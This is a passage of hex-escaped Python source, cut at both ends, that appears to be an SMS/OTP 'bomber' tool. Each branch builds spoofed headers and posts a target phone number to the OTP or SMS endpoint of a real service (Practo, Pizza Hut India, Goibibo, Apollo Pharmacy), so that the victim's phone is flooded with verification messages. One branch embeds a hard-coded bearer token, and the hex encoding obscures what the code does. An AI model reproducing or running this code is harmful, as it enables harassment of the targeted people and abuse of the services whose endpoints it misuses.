x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x3a\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x3a\x32\x2e\x30\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x3a\x41\x6e\x64\x72\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x3a\x31\x35\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x3a\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x22\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x39\x36\x22\x20\x2d\x64\x20\x20\x22\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x3d\x50\x72\x61\x63\x74\x6f\x2b\x41\x6e\x64\x72\x6f\x69\x64\x2b\x41\x70\x70\x26\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x3d\x26\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x3d\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x26\x22\x20\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x75\x63\x63\x65\x73\x73\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x75\x74\x68\x6f\x72\x69\x7a\x61\x74\x69\x6f\x6e\x27\x3a\x20\x27\x42\x65\x61\x72\x65\x72\x20\x5a\x58\x6c\x4b\x61\x47\x4a\x48\x59\x32\x6c\x50\x61\x55\x70\x4a\x56\x58\x70\x4a\x4d\x55\x35\x70\x53\x58\x4e\x4a\x62\x6c\x49\x31\x59\x30\x4e\x4a\x4e\x6b\x6c\x72\x63\x46\x68\x57\x51\x30\x6f\x35\x4c\x6d\x56\x35\x53\x6d\x74\x5a\x57\x46\x4a\x6f\x53\x57\x70\x77\x4e\x30\x6c\x75\x55\x6e\x5a\x68\x4d\x6c\x5a\x31\x53\x57\x70\x76\x61\x57\x49\x7a\x51\x58\x68\x69\x52\x30\x70\x79\x5a\x45\x63\x78\x62\x47\x52\x59\x53\x54\x42\x4e\x57\x45\x4a\x79\x54\x6c\x52\x47\x4e\x57\x4e\x71\x51\x6a\x42\x6b\x62\x55\x5a\x73\x53\x57\x6c\x33\x61\x56\x6c\x59\x56\x6a\x42\x68\x51\x30\x6b\x32\x53\x57\x31\x57\x4e\x56\x4e\x71\x51\x6d\x78\x58\x52\x55\x5a\x77\x56\x44\x4a\x73\x53\x31\x4d\x78\x57\x58\x68\x56\x56\x32\x78\x4e\x55\x54\x42\x77\x62\x31\x6c\x72\x5a\x47\x70\x68\x56\x54\x6c\x77\x55\x32\x74\x73\x56\x6d\x56\x72\x61\x33\x68\x55\x62\x57\x78\x4c\x54\x31\x4d\x31\x62\x47\x56\x56\x63\x44\x46\x58\x56\x6d\x4e\x34\x59\x6b\x64\x47\x57\x46\x56\x58\x62\x46\x42\x68\x56\x57\x74\x33\x56\x47\x74\x53\x62\x6d\x46\x56\x65\x45\x52\x54\x62\x6d\x52\x71\x59\x6c\x64\x34\x4d\x46\x64\x57\x61\x45\x74\x4f\x56\x6d\x39\x36\x55\x32\x35\x61\x61\x31\x64\x46\x53\x6a\x5a\x5a\x56\x6d\x52\x53\x59\x56\x55\x35\x63\x46\x4e\x55\x56\x6c\x42\x53\x4d\x55\x59\x30\x56\x44\x42\x6b\x55\x6b\x35\x46\x4d\x58\x42\x4e\x56\x32\x78\x61\x56\x6b\x5a\x56\x4d\x56\x52\x47\x55\x6c\x4a\x4f\x56\x54\x56\x56\x57\x54\x4e\x53\x55\x46\x59\x77\x4d\x44\x46\x55\x56\x32\x74\x33\x5a\x57\x78\x77\x63\x56\x70\x36\x56\x6b\x35\x68\x61\x30\x56\x36\x56\x31\x5a\x53\x54\x6b\x31\x47\x63\x48\x46\x58\x56\x32\x78\x4e\x55\x54\x42\x77\x64\x31\x6c\x36\x54\x6b\x35\x68\x56\x54\x6c\x77\x55\x32\x30\x35\x61\x31\x4e\x47\x53\x6a\x4e\x55\x4d\x6d\x73\x30\x5a\x47\x31\x52\x65\x6c\x70\x45\x54\x6b\x31\x69\x56\x45\x5a\x76\x57\x54\x49\x31\x55\x32\x4e\x57\x62\x46\x68\x55\x62\x6b\x70\x4e\x59\x6c\x55\x31\x4d\x6c\x6c\x73\x54\x54\x56\x68\x4d\x58\x42\x5a\x56\x32\x31\x34\x61\x56\x4a\x36\x62\x44\x4e\x58\x62\x47\x68\x4c\x59\x55\x64\x4f\x53\x47\x45\x79\x62\x45\x31\x52\x4d\x48\x42\x76\x57\x6b\x5a\x6b\x55\x6d\x46\x56\x4f\x58\x42\x54\x62\x54\x6c\x72\x55\x30\x5a\x4b\x4d\x31\x51\x79\x61\x7a\x52\x6b\x62\x56\x46\x36\x57\x6b\x52\x4f\x54\x57\x4a\x55\x52\x6d\x39\x5a\x4d\x6a\x56\x54\x59\x31\x5a\x73\x57\x46\x52\x75\x53\x6b\x31\x69\x56\x54\x55\x79\x57\x57\x78\x4e\x4e\x57\x45\x78\x63\x46\x6c\x58\x62\x58\x68\x70\x55\x6e\x70\x73\x4d\x31\x64\x73\x61\x45\x74\x68\x52\x30\x35\x49\x59\x54\x4a\x73\x54\x56\x45\x77\x63\x48\x4e\x61\x56\x57\x68\x43\x59\x56\x55\x35\x63\x56\x4a\x55\x52\x6b\x39\x57\x52\x33\x4d\x78\x56\x47\x35\x77\x61\x6b\x31\x56\x4d\x55\x56\x56\x57\x45\x35\x4b\x59\x6c\x52\x57\x63\x46\x64\x74\x62\x45\x70\x4f\x61\x7a\x46\x56\x56\x6c\x52\x47\x55\x46\x5a\x48\x63\x33\x70\x55\x57\x48\x42\x79\x5a\x44\x41\x31\x53\x55\x31\x44\x4e\x56\x52\x61\x4d\x31\x70\x34\x55\x6d\x78\x4f\x5a\x6c\x64\x74\x54\x54\x4e\x61\x53\x45\x35\x70\x54\x56\x64\x53\x4e\x47\x4a\x57\x56\x6b\x64\x6b\x53\x45\x45\x78\x59\x57\x35\x57\x4d\x6b\x39\x46\x4e\x54\x56\x57\x65\x6b\x49\x79\x5a\x44\x45\x35\x54\x56\x52\x75\x54\x6b\x4a\x4e\x62\x57\x68\x47\x56\x6b\x56\x30\x65\x6b\x6c\x70\x64\x32\x6c\x6b\x57\x45\x4a\x72\x57\x56\x68\x53\x62\x46\x70\x44\x53\x54\x5a\x4e\x56\x46\x55\x78\x54\x31\x52\x72\x4d\x30\x31\x36\x61\x33\x64\x4f\x52\x46\x55\x78\x54\x6e\x6c\x33\x61\x57\x52\x59\x54\x6d\x78\x6a\x61\x32\x78\x72\x53\x57\x70\x76\x61\x55\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x45\x31\x45\x51\x58\x64\x4e\x51\x7a\x42\x33\x54\x55\x52\x42\x64\x30\x78\x55\x51\x58\x64\x4e\x52\x45\x46\x30\x54\x55\x52\x42\x64\x30\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x30\x6c\x70\x64\x32\x6c\x61\x4d\x6c\x5a\x31\x57\x6c\x68\x4b\x61\x47\x52\x48\x56\x6d\x74\x4a\x61\x6d\x39\x34\x54\x6c\x52\x56\x4e\x55\x39\x55\x59\x33\x70\x50\x56\x45\x45\x77\x54\x6c\x52\x56\x4d\x32\x5a\x54\x64\x32\x6c\x68\x56\x30\x59\x77\x53\x57\x70\x76\x65\x45\x35\x55\x56\x54\x56\x50\x56\x47\x4e\x36\x54\x31\x52\x42\x4d\x45\x78\x44\x53\x6d\x78\x6c\x53\x45\x46\x70\x54\x32\x70\x46\x4d\x55\x35\x71\x51\x54\x52\x4e\x65\x6d\x4d\x31\x54\x55\x52\x53\x4f\x53\x35\x43\x4d\x47\x52\x31\x4e\x46\x6c\x45\x51\x56\x70\x74\x54\x47\x4e\x55\x4d\x30\x5a\x48\x4d\x30\x52\x70\x53\x6e\x51\x78\x4e\x33\x52\x7a\x52\x47\x6c\x4a\x61\x56\x5a\x6b\x55\x46\x6c\x34\x5a\x48\x49\x79\x56\x7a\x6c\x74\x65\x6e\x6b\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x73\x6f\x75\x72\x63\x65\x2d\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x50\x57\x41\x46\x57\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x6e\x67\x75\x61\x67\x65\x63\x6f\x64\x65\x27\x3a\x20\x27\x65\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x6c\x6f\x67\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x41\x4b\x41\x5f\x41\x32\x3d\x41\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x75\x73\x74\x6f\x6d\x65\x72\x22\x3a\x7b\x22\x4d\x6f\x62\x69\x6c\x65\x4e\x6f\x22\x3a\x70\x6e\x2c\x22\x55\x73\x65\x72\x4e\x61\x6d\x65\x22\x3a\x70\x6e\x2c\x22\x6d\x65\x72\x63\x68\x61\x6e\x74\x49\x64\x22\x3a\x22\x39\x38\x64\x31\x38\x64\x38\x32\x2d\x62\x61\x35\x39\x2d\x34\x39\x35\x37\x2d\x39\x63\x39\x32\x2d\x33\x66\x38\x39\x32\x30\x37\x61\x33\x34\x66\x36\x22\x7d\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x61\x72\x74\x2f\x73\x65\x6e\x64\x2d\x6f\x74\x70\x3f\x6c\x61\x6e\x67\x43\x6f\x64\x65\x3d\x65\x6e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x33\x32\x3b\x20\x78\x33\x32\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x37\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x3f\x73\x6d\x73\x3d\x73\x75\x63\x63\x65\x73\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x70\x67\x72\x61\x64\x65\x2d\x69\x6e\x73\x65\x63\x75\x72\x65\x2d\x72\x65\x71\x75\x65\x73\x74\x73\x27\x3a\x20\x27\x31\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x62\x6c\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x73\x6d\x73\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x6c\x6f\x67\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x73\x65\x63\x74\x69\x6f\x6e\x5f\x64\x61\x74\x61\x5f\x69\x64\x73\x3d\x25\x37\x42\x25\x32\x32\x63\x61\x72\x74\x25\x32\x32\x25\x33\x41\x31\x35\x36\x30\x32\x33\x39\x37\x35\x31\x25\x37\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x73\x65\x6e\x64\x6f\x74\x70\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x65\x6e\x74\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\